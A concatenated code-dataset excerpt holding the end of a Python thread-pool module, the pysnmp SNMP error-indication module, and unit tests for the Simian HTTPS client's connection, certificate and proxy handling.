self.mcond.release()
for worker in workers:
while True:
worker.join(1)
if not worker.isAlive():
break
self.l.warn("Still waiting on %s" % worker)
self.l.info(" joined")
def stop(self):
self.running = False
with self.mcond:
self.mcond.notify()
def _queue(self, raw, name=None):
if self.actualFT == 0:
self.l.warn("No actual free threads, yet " +
"(increase threadPool.minFree)")
self.jobs.append((raw, name))
self.expectedFT -= 1
self.cond.notify()
self.mcond.notify()
def execute_named(self, function, name=None, *args, **kwargs):
def _entry():
function(*args, **kwargs)
return True
with self.mcond:
with self.cond:
self._queue(_entry, name)
def execute(self, function, *args, **kwargs):
self.execute_named(function, None, *args, **kwargs)
def join(self):
self.main_thread.join()
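# Illustrative usage sketch (not part of the original module). It assumes a
# Mirte setup has already instantiated this module as `threadPool` and
# supplied the `min`, `minFree` and `maxFree` settings referenced in run();
# none of those names are defined in this file.
#
#   threadPool.start()                               # spawn the manager thread
#   threadPool.execute(some_function, 1, 2)          # run some_function(1, 2)
#   threadPool.execute_named(other_function, 'job')  # same, with a worker name
#   threadPool.stop()                                # ask the manager to wind down
#   threadPool.join()                                # wait for the manager thread
#
# The manager loop in run() keeps roughly between `minFree` and `maxFree` idle
# workers alive, creating or retiring Worker threads as the job queue grows or
# drains.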
# vim: et:sta:bs=2:sw=4:
| agpl-3.0 | -2,098,936,524,364,315,100 | 29.640244 | 66 | 0.487363 | false |
ww9rivers/pysnmp | pysnmp/proto/errind.py | 4 | 5505 | #
# This file is part of pysnmp software.
#
# Copyright (c) 2005-2016, Ilya Etingof <[email protected]>
# License: http://pysnmp.sf.net/license.html
#
class ErrorIndication:
"""SNMPv3 error-indication values"""
def __init__(self, descr=None):
self.__value = self.__descr = self.__class__.__name__[0].lower() + self.__class__.__name__[1:]
if descr:
self.__descr = descr
def __eq__(self, other):
return self.__value == other
def __ne__(self, other):
return self.__value != other
def __lt__(self, other):
return self.__value < other
def __le__(self, other):
return self.__value <= other
def __gt__(self, other):
return self.__value > other
def __ge__(self, other):
return self.__value >= other
def __str__(self):
return self.__descr
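# Illustrative note (not part of the original module): __eq__ compares against
# the camelCase name derived from the class, so an instance tests equal to
# that plain string while str() yields the longer description. For example,
# using the RequestTimedOut class defined further below:
#
#   err = RequestTimedOut('No SNMP response received before timeout')
#   err == 'requestTimedOut'   # True
#   str(err)                   # 'No SNMP response received before timeout'
#
# This is why applications can compare a returned errorIndication directly
# against string literals such as 'requestTimedOut'.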
# SNMP message processing errors
class SerializationError(ErrorIndication):
pass
serializationError = SerializationError('SNMP message serialization error')
class DeserializationError(ErrorIndication):
pass
deserializationError = DeserializationError('SNMP message deserialization error')
class ParseError(DeserializationError):
pass
parseError = ParseError('SNMP message deserialization error')
class UnsupportedMsgProcessingModel(ErrorIndication):
pass
unsupportedMsgProcessingModel = UnsupportedMsgProcessingModel('Unknown SNMP message processing model ID encountered')
class UnknownPDUHandler(ErrorIndication):
pass
unknownPDUHandler = UnknownPDUHandler('Unhandled PDU type encountered')
class UnsupportedPDUtype(ErrorIndication):
pass
unsupportedPDUtype = UnsupportedPDUtype('Unsupported SNMP PDU type encountered')
class RequestTimedOut(ErrorIndication):
pass
requestTimedOut = RequestTimedOut('No SNMP response received before timeout')
class EmptyResponse(ErrorIndication):
pass
emptyResponse = EmptyResponse('Empty SNMP response message')
class NonReportable(ErrorIndication):
pass
nonReportable = NonReportable('Report PDU generation not attempted')
class DataMismatch(ErrorIndication):
pass
dataMismatch = DataMismatch('SNMP request/response parameters mismatched')
class EngineIDMismatch(ErrorIndication):
pass
engineIDMismatch = EngineIDMismatch('SNMP engine ID mismatch encountered')
class UnknownEngineID(ErrorIndication):
pass
unknownEngineID = UnknownEngineID('Unknown SNMP engine ID encountered')
class TooBig(ErrorIndication):
pass
tooBig = TooBig('SNMP message will be too big')
class LoopTerminated(ErrorIndication):
pass
loopTerminated = LoopTerminated('Infinite SNMP entities talk terminated')
class InvalidMsg(ErrorIndication):
pass
invalidMsg = InvalidMsg('Invalid SNMP message header parameters encountered')
# SNMP security modules errors
class UnknownCommunityName(ErrorIndication):
pass
unknownCommunityName = UnknownCommunityName('Unknown SNMP community name encountered')
class NoEncryption(ErrorIndication):
pass
noEncryption = NoEncryption('No encryption services configured')
class EncryptionError(ErrorIndication):
pass
encryptionError = EncryptionError('Ciphering services not available')
class DecryptionError(ErrorIndication):
pass
decryptionError = DecryptionError('Ciphering services not available or ciphertext is broken')
class NoAuthentication(ErrorIndication):
pass
noAuthentication = NoAuthentication('No authentication services configured')
class AuthenticationError(ErrorIndication):
pass
authenticationError = AuthenticationError('Ciphering services not available or bad parameters')
class AuthenticationFailure(ErrorIndication):
pass
authenticationFailure = AuthenticationFailure('Authenticator mismatched')
class UnsupportedAuthProtocol(ErrorIndication):
pass
unsupportedAuthProtocol = UnsupportedAuthProtocol('Authentication protocol is not supported')
class UnsupportedPrivProtocol(ErrorIndication):
pass
unsupportedPrivProtocol = UnsupportedPrivProtocol('Privacy protocol is not supported')
class UnknownSecurityName(ErrorIndication):
pass
unknownSecurityName = UnknownSecurityName('Unknown SNMP security name encountered')
class UnsupportedSecurityModel(ErrorIndication):
pass
unsupportedSecurityModel = UnsupportedSecurityModel('Unsupported SNMP security model')
class UnsupportedSecurityLevel(ErrorIndication):
pass
unsupportedSecurityLevel = UnsupportedSecurityLevel('Unsupported SNMP security level')
class NotInTimeWindow(ErrorIndication):
pass
notInTimeWindow = NotInTimeWindow('SNMP message timing parameters not in windows of trust')
# SNMP access-control errors
class NoSuchView(ErrorIndication):
pass
noSuchView = NoSuchView('No such MIB view currently exists')
class NoAccessEntry(ErrorIndication):
pass
noAccessEntry = NoAccessEntry('Access to MIB node denied')
class NoGroupName(ErrorIndication):
pass
noGroupName = NoGroupName('No such VACM group configured')
class NoSuchContext(ErrorIndication):
pass
noSuchContext = NoSuchContext('SNMP context not found')
class NotInView(ErrorIndication):
pass
notInView = NotInView('Requested OID is out of MIB view')
class AccessAllowed(ErrorIndication):
pass
accessAllowed = AccessAllowed()
class OtherError(ErrorIndication):
pass
otherError = OtherError('Unspecified SNMP engine error occurred')
# SNMP Apps errors
class OidNotIncreasing(ErrorIndication):
pass
oidNotIncreasing = OidNotIncreasing('OIDs are not increasing')
| bsd-2-clause | 6,112,383,067,007,407,000 | 23.909502 | 117 | 0.769482 | false |
googlearchive/simian | src/tests/simian/client/client_test.py | 1 | 41740 | #!/usr/bin/env python
#
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""client module tests."""
import httplib
import logging
import sys
from pyfakefs import fake_filesystem
import M2Crypto
import mock
import stubout
from google.apputils import app
from google.apputils import basetest
from simian import auth
from simian.client import client
class ClientModuleTest(basetest.TestCase):
"""Test the client module."""
def testConstants(self):
for a in [
'SERVER_HOSTNAME', 'SERVER_PORT', 'AUTH_DOMAIN',
'CLIENT_SSL_PATH', 'SEEK_SET', 'SEEK_CUR', 'SEEK_END',
'DEBUG', 'URL_UPLOADPKG']:
self.assertTrue(hasattr(client, a))
class MultiBodyConnectionTest(basetest.TestCase):
"""Test MultiBodyConnection class."""
def setUp(self):
super(MultiBodyConnectionTest, self).setUp()
self.stubs = stubout.StubOutForTesting()
self.mbc = client.MultiBodyConnection()
def tearDown(self):
super(MultiBodyConnectionTest, self).tearDown()
self.stubs.UnsetAll()
def testSetProgressCallback(self):
"""Test SetProgressCallback()."""
fn = lambda x: 1
self.assertFalse(hasattr(self.mbc, '_progress_callback'))
self.mbc.SetProgressCallback(fn)
self.assertEqual(self.mbc._progress_callback, fn)
self.assertRaises(
client.Error,
self.mbc.SetProgressCallback, 1)
def testProgressCallback(self):
"""Test _ProgressCallback()."""
self.mbc._ProgressCallback(1, 2)
self.mbc._progress_callback = mock.Mock()
self.mbc._ProgressCallback(1, 2)
self.mbc._progress_callback.assert_called_with(1, 2)
@mock.patch.object(client.httplib.HTTPConnection, 'request')
def testRequest(self, mock_request):
"""Test request()."""
fs = fake_filesystem.FakeFilesystem()
fake_os = fake_filesystem.FakeOsModule(fs)
fake_open = fake_filesystem.FakeFileOpen(fs)
file_name = '/f1'
file_size = 10000
f_body = 'x' * file_size
fs.CreateFile(file_name, contents=f_body)
fake_file = fake_open(file_name, 'r')
self.stubs.Set(client, 'os', fake_os)
method = 'GET'
url = '/foo'
body = ['hello', fake_file]
content_length = len(body[0]) + file_size
headers = {
'Content-Length': content_length,
}
self.mbc._is_https = False
self.mbc.send = mock.Mock()
self.mbc._ProgressCallback = mock.Mock()
inorder_calls = mock.Mock()
inorder_calls.attach_mock(mock_request, 'request')
inorder_calls.attach_mock(self.mbc.send, 'send')
inorder_calls.attach_mock(self.mbc._ProgressCallback, '_ProgressCallback')
self.mbc.request(method, url, body=body)
inorder_calls.assert_has_calls([
mock.call.request(self.mbc, method, url, headers=headers),
mock.call._ProgressCallback(0, content_length),
mock.call.send(body[0]),
mock.call._ProgressCallback(len(body[0]), content_length),
mock.call.send(f_body[:8192]),
mock.call._ProgressCallback(len(body[0]) + 8192, content_length),
mock.call.send(f_body[8192:]),
mock.call._ProgressCallback(len(body[0]) + file_size, content_length),
mock.call._ProgressCallback(len(body[0]) + file_size, content_length)])
class HTTPSMultiBodyConnectionTest(basetest.TestCase):
def setUp(self):
self.stubs = stubout.StubOutForTesting()
self.hostname = 'foohost'
self.mbc = client.HTTPSMultiBodyConnection(self.hostname)
def tearDown(self):
self.stubs.UnsetAll()
def testParentClassRequestAssumption(self):
"""Test assumptions of parent class request()."""
method = 'GET'
url = '/foo'
body = None
headers = {}
with mock.patch.object(
client.httplib.HTTPConnection,
'_send_request', return_value=-1) as mock_fn:
c = client.httplib.HTTPConnection(self.hostname)
self.assertEqual(None, c.request(method, url))
mock_fn.assert_called_once_with(method, url, body, headers)
@mock.patch.object(client.httplib.HTTPConnection, 'send', autospec=True)
@mock.patch.object(client.httplib.HTTPConnection, 'endheaders')
@mock.patch.object(client.httplib.HTTPConnection, 'putheader')
@mock.patch.object(client.httplib.HTTPConnection, 'putrequest')
def testParentClassSendRequestAssumptionEmptyBody(
self, putrequest_mock, putheader_mock, endheaders_mock, send_mock):
"""Test assumptions of parent class _send_request()."""
method = 'GET'
url = '/foo'
body1 = None
headers = {'foo': 'bar'}
inorder_calls = mock.Mock()
inorder_calls.attach_mock(putrequest_mock, 'putrequest')
inorder_calls.attach_mock(putheader_mock, 'putheader')
inorder_calls.attach_mock(endheaders_mock, 'endheaders')
inorder_calls.attach_mock(send_mock, 'send')
    # With a None body supplied, send() is never called. On >= 2.7,
    # endheaders() is still called with the body contents, even if they
    # are None.
c = client.httplib.HTTPConnection(self.hostname)
c._send_request(method, url, body1, headers)
expected = [
mock.call.putrequest(method, url),
mock.call.putheader('foo', headers['foo'])
]
if sys.version_info[0] >= 2 and sys.version_info[1] >= 7:
expected.append(mock.call.endheaders(body1))
else:
expected.append(mock.call.endheaders())
inorder_calls.assert_has_calls(expected)
@mock.patch.object(client.httplib.HTTPConnection, 'send', autospec=True)
@mock.patch.object(client.httplib.HTTPConnection, 'endheaders')
@mock.patch.object(client.httplib.HTTPConnection, 'putheader')
@mock.patch.object(client.httplib.HTTPConnection, 'putrequest')
def testParentClassSendRequestAssumption(
self, putrequest_mock, putheader_mock, endheaders_mock, send_mock):
"""Test assumptions of parent class _send_request()."""
method = 'GET'
url = '/foo'
body2 = 'howdy'
headers = {'foo': 'bar'}
inorder_calls = mock.Mock()
inorder_calls.attach_mock(putrequest_mock, 'putrequest')
inorder_calls.attach_mock(putheader_mock, 'putheader')
inorder_calls.attach_mock(endheaders_mock, 'endheaders')
inorder_calls.attach_mock(send_mock, 'send')
    # With a body supplied, send() is called inside _send_request() on
    # Python <= 2.6. On >= 2.7, endheaders() sends the body and headers
    # all at once.
expected = [
mock.call.putrequest(method, url),
mock.call.putheader('Content-Length', str(len(body2))),
mock.call.putheader('foo', headers['foo'])
]
if sys.version_info[0] >= 2 and sys.version_info[1] >= 7:
expected.append(mock.call.endheaders(body2))
else:
expected.append(mock.call.endheaders())
      expected.append(mock.call.send(body2))
c = client.httplib.HTTPConnection(self.hostname)
c._send_request(method, url, body2, headers)
inorder_calls.assert_has_calls(expected)
def testDirectSendTypes(self):
"""Test the DIRECT_SEND_TYPES constant for sane values."""
self.assertTrue(type(self.mbc.DIRECT_SEND_TYPES) is list)
@mock.patch.object(client.httplib.HTTPConnection, 'request')
@mock.patch.object(client.httplib.HTTPConnection, 'send')
def testRequestSimple(self, mock_send, mock_request):
"""Test request with one body element."""
method = 'GET'
url = '/foo'
body = 'hello'
headers = {
'Content-Length': len(body),
'Host': self.hostname,
}
self.mbc.request(method, url, body=body)
mock_request.assert_called_once_with(
self.mbc,
method, url, headers=headers)
mock_send.assert_called_once_with(body)
@mock.patch.object(client.httplib.HTTPConnection, 'request')
@mock.patch.object(client.httplib.HTTPConnection, 'send')
def testRequestMultiString(self, send_mock, request_mock):
"""Test request() with multiple body string elements."""
method = 'GET'
url = '/foo'
body = ['hello', 'there']
headers = {
'Content-Length': sum(map(len, body)),
'Host': self.hostname,
}
self.mbc.request(method, url, body=body)
request_mock.assert_called_once_with(self.mbc, method, url, headers=headers)
send_mock.assert_has_calls([mock.call(x) for x in body])
@mock.patch.object(client.httplib.HTTPConnection, 'send')
@mock.patch.object(client.httplib.HTTPConnection, 'request')
def testRequestMultiMixed(self, request_mock, send_mock):
"""Test request() with multiple mixed body elements."""
filepath = '/somefilename'
f_body = 'there'
fs = fake_filesystem.FakeFilesystem()
fs.CreateFile(filepath, contents=f_body)
fake_open = fake_filesystem.FakeFileOpen(fs)
f = fake_open(filepath)
method = 'GET'
url = '/foo'
body = ['hello', f]
content_length = len(body[0]) + len(f_body)
headers = {
'Content-Length': content_length,
'Host': self.hostname,
}
self.mbc.request(method, url, body=body)
request_mock.assert_called_once_with(self.mbc, method, url, headers=headers)
self.assertEqual(2, send_mock.call_count)
send_mock.assert_has_calls([mock.call(body[0]), mock.call(f_body)])
def testSetCACertChain(self):
"""Test SetCACertChain()."""
self.mbc.SetCACertChain('foo')
self.assertEqual(self.mbc._ca_cert_chain, 'foo')
def testIsValidCert(self):
"""Test _IsValidCert()."""
self.assertEqual(1, self.mbc._IsValidCert(1, 1))
def testIsValidCertOkZero(self):
"""Test _IsValidCert()."""
cert = mock.create_autospec(M2Crypto.X509.X509)
cert_subject = mock.create_autospec(M2Crypto.X509.X509_Name)
store = mock.create_autospec(M2Crypto.X509.X509_Store_Context)
store.get_current_cert.return_value = cert
cert.get_subject.return_value = cert_subject
cert_subject.__str__.return_value = 'valid'
self.assertEqual(0, self.mbc._IsValidCert(0, store))
cert_subject.__str__.assert_called()
@mock.patch.object(client.tempfile, 'NamedTemporaryFile', autospec=True)
def testLoadCACertChain(self, named_temporary_file_mock):
"""Test _LoadCACertChain()."""
temp_filepath = '/tmp/somefilename'
fs = fake_filesystem.FakeFilesystem()
fs.CreateFile(temp_filepath)
fake_open = fake_filesystem.FakeFileOpen(fs)
tf = fake_open(temp_filepath, 'w')
named_temporary_file_mock.return_value = tf
ctx = mock.create_autospec(M2Crypto.SSL.Context)
ctx.load_verify_locations.return_value = 1
cert_chain = 'cert chain la la ..'
self.mbc._ca_cert_chain = cert_chain
self.mbc._LoadCACertChain(ctx)
self.assertEqual(cert_chain, fake_open(temp_filepath, 'r').read())
# mock 2.0.0 incorrectly binds spec to calls
ctx._spec_signature = None
ctx.assert_has_calls([
mock.call.load_verify_locations(cafile=tf.name),
mock.call.set_verify(
client.SSL.verify_peer | client.SSL.verify_fail_if_no_peer_cert,
depth=9, callback=self.mbc._IsValidCert)])
@mock.patch.object(client.tempfile, 'NamedTemporaryFile', autospec=True)
def testLoadCACertChainWhenLoadError(self, named_temporary_file_mock):
"""Test _LoadCACertChain()."""
temp_filepath = '/tmp/somefilename'
fs = fake_filesystem.FakeFilesystem()
fs.CreateFile(temp_filepath)
fake_open = fake_filesystem.FakeFileOpen(fs)
tf = fake_open(temp_filepath, 'w')
named_temporary_file_mock.return_value = tf
cert_chain = 'cert chain la la ..'
self.mbc._ca_cert_chain = cert_chain
ctx = mock.create_autospec(M2Crypto.SSL.Context)
self.assertRaises(
client.SimianClientError, self.mbc._LoadCACertChain, ctx)
ctx.load_verify_locations.assert_called_once_with(cafile=tf.name)
self.assertEqual(cert_chain, fake_open(temp_filepath, 'r').read())
def testLoadCACertChainWhenNone(self):
"""Test _LoadCACertChain()."""
self.assertRaises(
client.SimianClientError, self.mbc._LoadCACertChain, mock.MagicMock())
@mock.patch.object(client.SSL, 'Context', autospec=True)
@mock.patch.object(client.SSL, 'Connection', autospec=True)
def testConnect(self, connection_mock, context_mock):
"""Test connect()."""
context = context_mock()
conn = connection_mock(context)
connection_mock.reset_mock()
context_mock.reset_mock()
self.mbc._ca_cert_chain = 'cert chain foo'
context_mock.return_value = context
connection_mock.return_value = conn
with mock.patch.object(self.mbc, '_LoadCACertChain') as load_ca_chain_mock:
self.mbc.connect()
self.assertEqual(self.mbc.sock, conn)
load_ca_chain_mock.assert_called_once_with(context)
context_mock.assert_called_once_with(client._SSL_VERSION)
connection_mock.assert_called_once_with(context)
conn.connect.assert_called_once_with((self.mbc.host, self.mbc.port))
if client._CIPHER_LIST:
context.assert_has_calls([mock.call.set_cipher_list(client._CIPHER_LIST)])
def testConnectWhenNoCACertChain(self):
"""Test connect()."""
context = mock.create_autospec(M2Crypto.SSL.Context)
with mock.patch.object(client.SSL, 'Context', return_value=context):
self.assertRaises(client.SimianClientError, self.mbc.connect)
if client._CIPHER_LIST:
context.assert_has_calls(
[mock.call.set_cipher_list(client._CIPHER_LIST)])
class HttpsClientTest(basetest.TestCase):
"""Test HttpsClient class."""
def setUp(self):
super(HttpsClientTest, self).setUp()
self.stubs = stubout.StubOutForTesting()
self.hostname = 'hostname'
self.port = None
self.client = client.HttpsClient(self.hostname)
def tearDown(self):
super(HttpsClientTest, self).tearDown()
self.stubs.UnsetAll()
@mock.patch.object(client.HttpsClient, '_LoadHost')
def testInit(self, mock_lh):
"""Test __init__()."""
i = client.HttpsClient(self.hostname)
self.assertEqual(i._progress_callback, None)
self.assertEqual(i._ca_cert_chain, None)
mock_lh.assert_called_once_with(self.hostname, None, None)
def testLoadHost(self):
"""Test _LoadHost()."""
self.client._LoadHost('host')
self.assertEqual(self.client.hostname, 'host')
self.assertEqual(self.client.port, None)
self.assertTrue(self.client.use_https)
self.client._LoadHost('host', 12345)
self.assertEqual(self.client.hostname, 'host')
self.assertEqual(self.client.port, 12345)
self.assertTrue(self.client.use_https)
self.client._LoadHost('https://tsoh:54321')
self.assertEqual(self.client.hostname, 'tsoh')
self.assertEqual(self.client.port, 54321)
self.assertTrue(self.client.use_https)
self.client._LoadHost('https://tsoh:54321', 9999)
self.assertEqual(self.client.hostname, 'tsoh')
self.assertEqual(self.client.port, 54321)
self.assertTrue(self.client.use_https)
self.client._LoadHost('foo.bar:5555')
self.assertEqual(self.client.hostname, 'foo.bar')
self.assertEqual(self.client.port, 5555)
self.assertTrue(self.client.use_https)
self.client._LoadHost('http://nonsecurehost')
self.assertEqual(self.client.hostname, 'nonsecurehost')
self.assertEqual(self.client.port, None)
self.assertFalse(self.client.use_https)
self.client._LoadHost('https://dev1.latest.%s' % client.SERVER_HOSTNAME)
self.assertEqual(
self.client.hostname, 'dev1.latest.%s' % client.SERVER_HOSTNAME)
self.assertEqual(self.client.port, None)
self.assertTrue(self.client.use_https)
self.client._LoadHost('http://dev2.latest.%s' % client.SERVER_HOSTNAME)
self.assertEqual(
self.client.hostname, 'dev2.latest.%s' % client.SERVER_HOSTNAME)
self.assertEqual(self.client.port, None)
self.assertFalse(self.client.use_https)
self.client._LoadHost('http://nonsecurehost:1234')
self.assertEqual(self.client.hostname, 'nonsecurehost')
self.assertEqual(self.client.port, 1234)
self.assertFalse(self.client.use_https)
self.client._LoadHost(u'http://unicodehost')
self.assertTrue(type(self.client.hostname) is str)
self.assertEqual(self.client.hostname, 'unicodehost')
self.client._LoadHost(u'http://unicodehost', proxy=u'http://evilproxy:9')
self.assertTrue(type(self.client.hostname) is str)
self.assertEqual(self.client.hostname, 'unicodehost')
self.assertTrue(type(self.client.proxy_hostname) is str)
self.assertEqual(self.client.proxy_hostname, 'evilproxy')
self.assertEqual(self.client.proxy_port, 9)
self.assertFalse(self.client.proxy_use_https)
self.client._LoadHost(u'http://unicodehost', proxy=u'https://evilprxssl:8')
self.assertTrue(type(self.client.hostname) is str)
self.assertEqual(self.client.hostname, 'unicodehost')
self.assertTrue(type(self.client.proxy_hostname) is str)
self.assertEqual(self.client.proxy_hostname, 'evilprxssl')
self.assertEqual(self.client.proxy_port, 8)
self.assertTrue(self.client.proxy_use_https)
def testSetCACertChain(self):
"""Test SetCACertChain()."""
self.client.SetCACertChain('foo')
self.assertEqual(self.client._ca_cert_chain, 'foo')
def _TestConnect(self, test_client, hostname, port):
"""Test _Connect()."""
m = mock.Mock()
m.return_value = m
test_client._ca_cert_chain = 'cert chain'
use_https = (
(not test_client.proxy_hostname and test_client.use_https) or
(test_client.proxy_hostname and test_client.proxy_use_https))
if use_https:
self.stubs.Set(client, 'HTTPSMultiBodyConnection', m)
else:
self.stubs.Set(client, 'HTTPMultiBodyConnection', m)
expected = [mock.call(hostname, port)]
if use_https:
expected.append(mock.call.SetCACertChain('cert chain'))
expected.append(mock.call.connect())
test_client._Connect()
m.assert_has_calls(expected)
def testConnect(self):
self._TestConnect(self.client, self.hostname, self.port)
def testConnectWithProxy(self):
test_client = client.HttpsClient(self.hostname, proxy='proxyhost:123')
self._TestConnect(test_client, 'proxyhost', 123)
def testGetResponseNoFile(self):
"""Test _GetResponse() storing body directly into response obj."""
headers = {'foo': 1}
status = 200
body = 'howdy sir'
body_len = len(body)
response = mock.create_autospec(httplib.HTTPResponse)
response.getheaders.return_value = headers
response.read.side_effect = [body, None]
response.status = status
response.reason = 'OK'
conn = mock.create_autospec(httplib.HTTPConnection)
conn.getresponse.return_value = response
r = self.client._GetResponse(conn)
self.assertEqual(r.headers, headers)
self.assertEqual(r.status, status)
self.assertEqual(r.body, body)
self.assertEqual(r.body_len, body_len)
def testGetResponseOutputFile(self):
"""Test _GetResponse() sending the body to output_file."""
headers = {'foo': 1}
status = 200
body = 'howdy sir'
body_len = len(body)
path = '/file'
fs = fake_filesystem.FakeFilesystem()
fs.CreateFile(path)
fake_open = fake_filesystem.FakeFileOpen(fs)
output_file = fake_open(path, 'w')
response = mock.create_autospec(httplib.HTTPResponse)
response.getheaders.return_value = headers
response.read.side_effect = [body, None]
response.status = status
response.reason = 'Ok'
conn = mock.create_autospec(httplib.HTTPSConnection)
conn.getresponse.return_value = response
r = self.client._GetResponse(conn, output_file=output_file)
self.assertEqual(r.headers, headers)
self.assertEqual(r.status, status)
self.assertEqual(r.body, None)
self.assertEqual(r.body_len, body_len)
output_file.close()
self.assertEqual(body, fake_open(path).read())
def testRequest(self):
"""Test _Request()."""
method = 'zGET'
url = u'/url'
body1 = {'encodeme': 1}
body1_encoded = client.urllib.urlencode(body1)
body2 = 'leave this alone'
headers = {'User-Agent': 'gzip'}
conn = mock.create_autospec(httplib.HTTPConnection)
self.client._Request(method, conn, url, body1, headers)
self.client._Request(method, conn, url, body2, headers)
conn.request.assert_has_calls([
mock.call(method, str(url), body=body1_encoded, headers=headers),
mock.call(method, str(url), body=body2, headers=headers)])
def _TestDoRequestResponse(self, test_client, url, req_url):
"""Test _DoRequestResponse()."""
method = 'zomg'
conn = mock.create_autospec(httplib.HTTPConnection)
body = 'body'
headers = 'headers'
output_file = None
response = mock.create_autospec(httplib.HTTPResponse)
response.status = 200
proxy_use_https = test_client.proxy_use_https
with mock.patch.object(test_client, '_Connect', return_value=conn):
request_mock = mock.create_autospec(test_client._Request)
self.stubs.Set(test_client, '_Request', request_mock)
get_response_mock = mock.Mock(return_value=response)
self.stubs.Set(test_client, '_GetResponse', get_response_mock)
self.assertEqual(
response,
test_client._DoRequestResponse(
method, url, body, headers, output_file))
request_mock.assert_called_once_with(
method, conn, req_url, body=body, headers=headers)
get_response_mock.assert_called_once_with(conn, output_file=output_file)
conn.assert_not_called()
response.assert_not_called()
with mock.patch.object(
test_client, '_Connect', side_effect=client.httplib.HTTPException):
self.assertRaises(
client.HTTPError,
test_client._DoRequestResponse,
method, url, body, headers, output_file)
def testDoRequestResponse(self):
self._TestDoRequestResponse(self.client, '/url', '/url')
def testDoHttpRequestResponseWithHttpProxy(self):
"""Test a https request via a http proxy."""
test_client = client.HttpsClient(
'http://%s' % self.hostname, proxy='proxyhost:123')
req_url = 'http://' + self.hostname + '/url'
self._TestDoRequestResponse(test_client, '/url', req_url)
def testDoHttpsRequestResponseWithHttpProxy(self):
"""Test a https request via a http proxy."""
# default is https
test_client = client.HttpsClient(
self.hostname, proxy='http://proxyhost:124')
req_url = 'https://' + self.hostname + '/url'
self._TestDoRequestResponse(test_client, '/url', req_url)
def testDoHttpRequestResponseWithHttpsProxy(self):
"""Test a https request via a http proxy."""
test_client = client.HttpsClient(
'http://%s' % self.hostname, proxy='https://proxyhost:125')
req_url = 'http://' + self.hostname + '/url'
self._TestDoRequestResponse(test_client, '/url', req_url)
def testDoHttpsRequestResponseWithHttpsProxy(self):
"""Test a https request via a http proxy."""
# default is https
test_client = client.HttpsClient(
self.hostname, proxy='https://proxyhost:126')
req_url = 'https://' + self.hostname + '/url'
self._TestDoRequestResponse(test_client, '/url', req_url)
def testDoWithInvalidMethod(self):
"""Test Do() with invalid method."""
self.assertRaises(
NotImplementedError,
self.client.Do, 'badmethod', '/url')
@mock.patch.object(client.time, 'sleep')
def testDo(self, mock_sleep):
"""Test Do() with correct arguments and no output_filename."""
method = 'GET'
url = 'url'
body = None
headers = None
output_file = None
output_filename = None
# HTTP 500 should retry.
mock_response_fail = mock.create_autospec(httplib.HTTPResponse)
mock_response_fail.status = 500
# HTTP 200 should succeed.
mock_response = mock.create_autospec(httplib.HTTPResponse)
mock_response.status = 200
with mock.patch.object(
self.client,
'_DoRequestResponse',
side_effect=[
mock_response_fail, mock_response]) as mock_do_request_response:
inorder_calls = mock.Mock()
inorder_calls.attach_mock(mock_sleep, 'sleep')
inorder_calls.attach_mock(mock_do_request_response, '_DoRequestResponse')
do_request_response_call = mock.call._DoRequestResponse(
method, url, body=body, headers={}, output_file=output_file)
self.client.Do(method, url, body, headers, output_filename)
inorder_calls.assert_has_calls([
mock.call.sleep(0), do_request_response_call,
mock.call.sleep(5), do_request_response_call])
@mock.patch.object(client.time, 'sleep')
def testDoWithRetryHttp500(self, mock_sleep):
"""Test Do() with a HTTP 500, thus a retry."""
method = 'GET'
url = 'url'
body = None
headers = None
output_file = None
output_filename = None
inorder_calls = mock.Mock()
inorder_calls.attach_mock(mock_sleep, 'sleep')
mock_response = mock.create_autospec(httplib.HTTPResponse)
mock_response.status = 500
with mock.patch.object(
self.client,
'_DoRequestResponse',
return_value=mock_response) as mock_do_request_response:
inorder_calls.attach_mock(mock_do_request_response, '_DoRequestResponse')
self.client.Do(method, url, body, headers, output_filename)
expected = []
for i in xrange(0, client.DEFAULT_HTTP_ATTEMPTS):
expected += [
mock.call.sleep(i * 5),
mock.call._DoRequestResponse(
method, url, body=body, headers={},
output_file=output_file)]
inorder_calls.assert_has_calls(expected)
@mock.patch.object(client.time, 'sleep')
def testDoWithRetryHttpError(self, mock_sleep):
"""Test Do() with a HTTP 500, thus a retry, but ending with HTTPError."""
method = 'GET'
url = 'url'
body = None
headers = None
output_file = None
output_filename = None
inorder_calls = mock.Mock()
inorder_calls.attach_mock(mock_sleep, 'sleep')
mock_response = mock.create_autospec(httplib.HTTPResponse)
mock_response.status = 500
with mock.patch.object(
self.client,
'_DoRequestResponse',
side_effect=client.HTTPError) as mock_do_request_response:
inorder_calls.attach_mock(mock_do_request_response, '_DoRequestResponse')
self.assertRaises(
client.HTTPError,
self.client.Do,
method, url, body, headers, output_filename)
expected = []
for i in xrange(0, client.DEFAULT_HTTP_ATTEMPTS):
expected += [
mock.call.sleep(i * 5),
mock.call._DoRequestResponse(
method, url, body=body, headers={},
output_file=output_file)]
inorder_calls.assert_has_calls(expected)
def testDoWithOutputFilename(self):
"""Test Do() where an output_filename is supplied."""
method = 'GET'
url = 'url'
body = None
headers = {}
output_file = mock.create_autospec(file)
mock_open = mock.Mock(return_value=output_file)
output_filename = '/tmpfile'
mock_response = mock.create_autospec(httplib.HTTPResponse)
mock_response.status = 200
with mock.patch.object(
self.client,
'_DoRequestResponse',
return_value=mock_response) as mock_do_request_response:
self.client.Do(
method, url, body, headers, output_filename, _open=mock_open)
mock_do_request_response.assert_called_once_with(
method, url, body=body, headers={}, output_file=output_file)
def testDoWithProxy(self):
"""Test Do() with a proxy specified."""
method = 'GET'
url = 'url'
proxy = 'proxyhost:123'
# Working case.
mock_response = mock.create_autospec(httplib.HTTPConnection)
mock_response.status = 200
test_client = client.HttpsClient(self.hostname, proxy=proxy)
with mock.patch.object(
test_client,
'_DoRequestResponse',
return_value=mock_response) as mock_do_request_response:
test_client.Do(method, url)
mock_do_request_response.assert_called_once_with(
method, url, body=None, headers={}, output_file=None)
# No port case.
proxy = 'proxyhost'
self.assertRaises(
client.Error,
client.HttpsClient, self.hostname, proxy=proxy)
# Bad port case.
proxy = 'proxyhost:alpha'
self.assertRaises(
client.Error,
client.HttpsClient, self.hostname, proxy=proxy)
class HttpsAuthClientTest(basetest.TestCase):
